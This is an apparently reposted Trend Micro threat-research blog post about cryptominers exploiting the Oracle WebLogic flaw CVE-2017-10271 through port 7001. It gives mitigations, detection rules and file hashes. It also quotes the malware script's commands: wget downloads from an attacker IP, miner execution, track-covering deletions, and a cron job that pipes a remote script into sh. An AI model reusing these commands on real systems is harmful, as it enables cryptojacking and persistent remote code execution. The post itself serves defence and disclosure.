Martijn Lammerts
My own digital place with a little of everything

Malicious Traffic in Port 7001 Surges as Cryptominers Target Patched 2017 Oracle WebLogic Vulnerability

By Hubert Lin

We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it’s increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271. The flaw is a patched Oracle WebLogic WLS-WSAT vulnerability that can allow remote attackers to execute arbitrary code on unpatched servers. This marks the second time attackers abused CVE-2017-10271 for cryptomining purposes this year. In February, the vulnerability was exploited to deliver 64-bit and 32-bit variants of an XMRig Monero miner.

Oracle WebLogic listens to port 7001/TCP by default. As seen below, we observed an increase in traffic caused by malicious activities from several ports, with the vast majority coming from port 7001/TCP. Having observed only 155 events between April 8 and April 26, the record between April 27 and May 9 accumulated 2,640 events from attackers with IP addresses mostly based in Russia and China.

Figure 1. Malicious traffic on April 27-May 9 was detected from several ports, mostly coming from 7001/TCP.

Figure 1. Malicious traffic on April 27-May 9 was detected from several ports, mostly coming from 7001/TCP.

Based on packet traces, the payload that can trigger unpatched servers to download and execute was observed at hxxp://94.250.253.178/logo8.sh.

Figure 2. Malicious HTTP request sent to vulnerable servers

Figure 2. Malicious HTTP request sent to vulnerable servers

If the vulnerability is exploited successfully and the Bourne shell script logo8.sh (detected by Trend Micros as Coinminer_MALXMR.DBFAJ-Component) is downloaded, the following actions will be launched:

  • Secure assets by killing possible unknown mining activities, such as:
    • pkill -f minergate
    • pkill -f minergate-cli
  • Download and execute cryptomining executables and configurations:
    • wget -O /tmp/vmak hxxp://94.250.253.178/xmrig_64
    • wget -O /tmp/httpd5_w1.conf hxxp://94.250.253.178/httpd5_w1.conf
    • chmod +x /tmp/vmak
    • nohup /tmp/vmak -c /tmp/httpd5_w1.conf>/dev/null 2>&1 &
  • Remove drops after execution to cover the attacker’s tracks:
    • rm -rf /tmp/httpd5_w1.conf
    • rm -f /tmp/vmak
    • rm -rf /tmp/logo8.sh
  • Maintain persistence by installing scheduled cron jobs:
    • o echo “* * * * * wget -q hxxp://94.250.253.178/logo8.sh -O – | sh” >> /tmp/cron || true && crontab /tmp/cron

The abovementioned malicious actions are somewhat similar to our findings discussed in a blog post about the CouchDB vulnerability, which attackers exploited for their Monero mining campaign in February 2018. It’s possible that the attackers behind that campaign are also the ones targeting CVE-2017-10271 the past two weeks.

Mitigations and Solutions

Servers can be especially attractive for cryptominers since they are a source of readily available computing power, unlike other devices that can be switched off. Since cryptomining doesn’t only slow down system performance but also expose organizations and users to a different range of malware threats, these standard security best practices should be applied:

  • Regularly update devices with the latest patches to help prevent attacks that exploit vulnerabilities.
  • Change the device’s default credentials and use strong credentials to block unauthorized access.
  • For users with home routers, enable firewalls and use available intrusion detection and prevention systems to prevent attackers from entering a device or network.
  • For IT professionals, use application whitelistingand other similar security features to help detect suspicious activity and prevent suspicious executables from running or installing.

In addition, Trend Micro™ XGen™ security can provide a cross-generational blend of threat defense techniques against a full range of threats for data centerscloud environmentsnetworks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against today’s purpose-built threats that bypass traditional controls or exploit known, unknown, or undisclosed vulnerabilities. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Trend Micro™ Smart Home Network customers are already protected from threats that can exploit the Oracle WebLogic vulnerability via this rule that was released in January 2018:

  • 1134359 WEB Oracle WebLogic Server WorkContextXmlInputAdapter Insecure Deserialization -1 (CVE-2017-10271)

Trend Micro™ Deep Security protects systems from threats via this DPI rule:

  • 1008808 – Oracle WebLogic WLS Security Component Remote Code Execution Vulnerabilities

Trend Micro™ Deep Discovery Inspector™ protects customers via this DDI rule:

  • DDI Rule ID 2600: CVE-2017-10271 – Oracle Weblogic Exploit – HTTP (Request)

Trend Micro™ TippingPoint™ customers are protected via this MainlineDV filter:

  • 30147: HTTP: Oracle WebLogic Command Injection Vulnerability

Indicators of Compromise (IoCs):

SHA-256s Detection Names
6f6332d8533488b5e167968f7c697bee871ea41b60f74255a66d4216554b3003 Coinminer_MALXMR.DBFAJ-Component
8c0a1766b0c79923794bb6625f7dccf88e70f683a237ff62241bd0edfa0b1275 Coinminer_MALXMR.DBFAJ-Component
e074ba32f9ffd609ba4d09ea172f4d178d75846dd52dc2d968e743eaa11daaf6 Coinminer_MALXMR.DBFAJ-ELF
d11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 Coinminer_MALXMR.DBFAJ-ELF

 

The post Malicious Traffic in Port 7001 Surges as Cryptominers Target Patched 2017 Oracle WebLogic Vulnerability appeared first on .

Share

Share

Ads